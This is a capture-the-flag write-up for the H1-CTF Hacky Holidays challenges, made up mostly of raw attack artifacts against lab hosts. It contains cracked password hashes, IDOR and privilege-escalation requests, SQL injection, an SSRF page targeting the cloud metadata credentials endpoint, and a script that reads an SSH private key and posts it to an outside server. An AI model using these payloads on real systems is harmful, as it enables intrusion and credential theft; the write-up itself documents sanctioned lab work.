H1-CTF Hacky Holidays Writeup

Part One

Warning: Undefined array key "password" in /var/www/html/public/_harvester_/code/harvest.php on line 19
INSERT INTO `users` (`id`, `username`, `password`, `salt`, `locked`) VALUES
(1, 'bob', '5de402c02cbf657370d179808f26d450', '564315833g', 1),
(2, 'jim', '2309467bac72082e270195f5a43303d0', 'angelae', 1),
(3, 'grinch', '0273f802f2882bcd5daf8f08a3fee512', 'pare…

2309467bac72082e270195f5a43303d0:angelae:austin
5de402c02cbf657370d179808f26d450:564315833g:freedom

Part Two

Part-Two Summary
$.get('api/name?id=2', function(resp){
  $('#name').html(resp.value);
});
$.get('api/address?id=c81e728d9d4c2f636f067f89cc14862c', function(resp){
  $('#address').html(resp.value);
});
$.get('api/position?id=eyJ1c2VyX2lkIjoyfQ==', function(resp){
  $('#position').html(resp.value);
});
$.get('api/image', function(resp){
  $('#profilepic').attr('src', resp.value);
});
$.get('api/salary?id=2', function(resp){
  $('#salary').html(resp.value);
});
$.get('api/dob?id=2', function(resp){
  $('#dob').html(resp.value);
});

  • id=1 in api/name
  • api/address?id=md5(1)
  • api/position?id=base64_encode({"user_id":1})
  • /api/image with Cookie: id=1
  • dob?id=1&id=2
  • PUT /staff_info/api/salary?id=1

{"message":"Payment Received, account upgraded"}

default.get("https://intranet.hackyholidays.h1ctf.com/api/christmasList", {headers: {Authorization: 'Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K'}, params: {flag: !1}})

GET /api/christmasList?flag=true HTTP/1.1
Host: intranet.hackyholidays.h1ctf.com
Authorization: Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K

Part Three

POST /p/../v1/users/5 HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 34

email=akshansh%40example.com=>graham.rinch@this.is.h1.101.h1ctf.com

POST /settings/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: candc_token=319fdd7782e96b43d5da3c5ce7be6e98

password=akshansh5%40this.is.h1.101.h1ctf.com&role=admin

POST /register/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com

email=akshansh51%40this.is.h1.101.h1ctf.com&password=akshansh51%40this.is.h1.101.h1ctf.com&c_password=akshansh51%40this.is.h1.101.h1ctf.com&role=admin

<!DOCTYPE html>
<html>
<body onload=window.location='http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance'>
</body>
</html>
<script>
async function getc2serverdata(){
  response = await fetch('https://c2.hackyholidays.h1ctf.com/~/.ssh/id_rsa');
  resp_value = await response.text();
  await fetch('http://myserver.com', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: JSON.stringify({
      'ssrf_data': resp_value
    })
  });
}
// the original called an undefined send(); the defined function is invoked here
getc2serverdata();
</script>

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://github.com/grinch-networks-two/directory-protector
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
	remote = origin
	merge = refs/heads/main

Day Eleven Flag: Come back tomorrow for more fun :)
Request Blocked using Directory Protector
private function expectedKeyword($codewords){
    $words = explode(PHP_EOL, file_get_contents($codewords));
    // line index = current hour (0-23, no leading zero) + current minute (00-59)
    $line = intval(date("G")) + intval(date("i"));
    return $words[$line];
}

<?php
$codewrd = explode("\n", file_get_contents("code.txt"));
// same index computation as expectedKeyword(): hour + minute
$line = intval(date("G")) + intval(date("i"));
echo json_encode(array("authorised" => true, "codeword" => $codewrd[$line], "timezone" => date_default_timezone_get(), "G" => date("G"), "i" => date("i"), "line" => $line));

GET /infrastructure_management/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: authorisation_token=eyJzZXJ2ZXIiOiAiZXhhbXBsZS5jb20vY2hhbGwucGhwIyIsICJ0b2tlbiI6ICJhIn0=
<script>
let users = {};
$.get('../get_column?column=username', function(resp){
  $.each(resp, function(k, v){
    users[v] = true;
  });
  console.log(users);
});
$('.loginfrm').click(function(){
  let u = $('input[name="username"]').val();
  if( !users.hasOwnProperty(u) ){
    alert('Username cannot be found');
    return false;
  }
});
</script>
</body>

  • username: grinch
  • password: 40bf586cb6c1c1bab623ace03dc6b6fb (the password was of no use; only the username could be used)

GET /infrastructure_management/get_column?column=SUBSTR((SELECT+INFO+FROM+information_schema.PROCESSLIST+WHERE+INFO+LIKE+'SELECT+*,SLEE%25'),1,10)
Security is Fun
Akshansh JaisWal